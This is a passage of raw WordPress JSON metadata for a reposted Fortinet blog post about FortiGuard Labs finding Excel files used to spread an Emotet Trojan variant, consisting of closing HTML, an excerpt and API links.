href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?utm_source=blog&amp;utm_campaign=fortiguard-labs\">FortiGuard Labs<\/a> threat research and intelligence organization and the FortiGuard Security Subscriptions and Services <a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?tab=security-bundles&amp;utm_source=blog&amp;utm_campaign=security-bundles\">portfolio<\/a>.<\/i><\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<div id=\"om-qbkzwxxbiv83f0ol5a2d-holder\"><\/div>\n<\/div><\/div>\n<\/p><\/div>\n<p><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image.img.png\/1646637764539\/img1.png\"\/><br \/>FortiGuard Labs discovered more than 500 Microsoft Excel files involved in a campaign to deliver a fresh Emotet Trojan variant. 
Read on to learn how to avoid this lure.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-18440","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/18440","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=18440"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/18440\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=18440"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=18440"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=18440"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}